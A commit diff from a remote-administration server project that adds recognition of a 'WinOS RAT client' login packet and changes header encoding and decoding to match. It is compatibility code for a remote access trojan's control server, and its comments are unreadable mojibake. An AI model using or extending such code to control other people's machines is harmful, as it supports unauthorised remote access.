admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Feature: Support WinOS RAT client

Browse Source
This commit is contained in:
yuanyuanxiang
2025-06-11 03:16:09 +08:00
parent 3b53519e89
commit ddb2fc87b5
7 changed files with 107 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

39
server/2015Remote/IOCPServer.h
View File

@@ -44,6 +44,7 @@ enum
};
enum {
PARSER_WINOS = -2,
PARSER_FAILED = -1, // <20><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>
PARSER_NEEDMORE = 0, // <20><>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
};
@@ -56,6 +57,9 @@ typedef struct PR {
bool IsNeedMore() const {
return PARSER_NEEDMORE == Result;
}
bool IsWinOSLogin() const {
return PARSER_WINOS == Result;
}
}PR;
enum {
@@ -87,6 +91,23 @@ protected:
HeaderEncType encTyp = HeaderEncUnknown;
FlagType flagType = CheckHead(szPacketFlag, encTyp);
if (flagType == FLAG_UNKNOWN) {
// <20><><EFBFBD>ݳ<EFBFBD><DDB3><EFBFBD> + ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [4<>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><CAB1>+4<><34>0<EFBFBD>ֽ<EFBFBD>+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʶ+ϵͳλ<CDB3><CEBB><EFBFBD><EFBFBD>ʶ]
const BYTE* ptr = (BYTE*)buf.GetBuffer(0), *p = ptr+4;
int length = *((int*)ptr);
int excepted = buf.GetBufferLength();
if (length == excepted && length == 16 && p[4] == 0 && p[5] == 0 &&
p[6] == 0&& p[7] == 0 && p[8] == 202 && (p[9] == 0 || p[9] == 1)) {
m_nFlagType = FLAG_WINOS;
compressMethod = COMPRESS_NONE;
memcpy(m_szPacketFlag, p, 10); // ͨ<><CDA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
m_nCompareLen = 0;
m_nFlagLen = 0;
m_nHeaderLen = 14;
m_bParsed = TRUE;
m_Encoder = new Encoder();
m_Encoder2 = new WinOsEncoder();
return PR{ PARSER_WINOS };
}
return PR{ PARSER_FAILED };
}
if (m_bParsed) { // Check if the header has been parsed.
@@ -162,6 +183,9 @@ protected:
const char* GetFlag() const {
return m_szPacketFlag;
}
FlagType GetFlagType() const {
return m_nFlagType;
}
Encoder* GetEncoder() const {
return m_Encoder;
}
@@ -264,8 +288,13 @@ typedef struct CONTEXT_OBJECT
encrypt(szPacketFlag, FLAG_COMPLEN, szPacketFlag[flagLen - 2]);
OutCompressedBuffer.WriteBuffer((LPBYTE)szPacketFlag, flagLen);
OutCompressedBuffer.WriteBuffer((PBYTE)&totalLen, sizeof(ULONG));
OutCompressedBuffer.WriteBuffer((PBYTE)&originLen, sizeof(ULONG));
InDeCompressedBuffer.CopyBuffer(szPacketFlag + flagLen, 16, 16);
if (Parser.GetFlagType() == FLAG_WINOS) {
memcpy(szPacketFlag, Parser.GetFlag(), 10);
OutCompressedBuffer.WriteBuffer((PBYTE)Parser.GetFlag(), 10);
}else {
OutCompressedBuffer.WriteBuffer((PBYTE)&originLen, sizeof(ULONG));
InDeCompressedBuffer.CopyBuffer(szPacketFlag + flagLen, 16, 16);
}
Encode2(data, dataLen, szPacketFlag);
OutCompressedBuffer.WriteBuffer(data, dataLen);
}
@@ -277,7 +306,11 @@ typedef struct CONTEXT_OBJECT
BYTE szPacketFlag[32] = {};
InCompressedBuffer.ReadBuffer((PBYTE)szPacketFlag, Parser.GetFlagLen());
InCompressedBuffer.ReadBuffer((PBYTE)&totalLen, sizeof(ULONG));
InCompressedBuffer.ReadBuffer((PBYTE)&originLen, sizeof(ULONG));
if (Parser.GetFlagType() == FLAG_WINOS) {
InCompressedBuffer.ReadBuffer((PBYTE)szPacketFlag, 10);
} else {
InCompressedBuffer.ReadBuffer((PBYTE)&originLen, sizeof(ULONG));
}
dataLen = totalLen - Parser.GetHeaderLen();
PBYTE CompressedBuffer = new BYTE[dataLen];
InCompressedBuffer.ReadBuffer(CompressedBuffer, dataLen);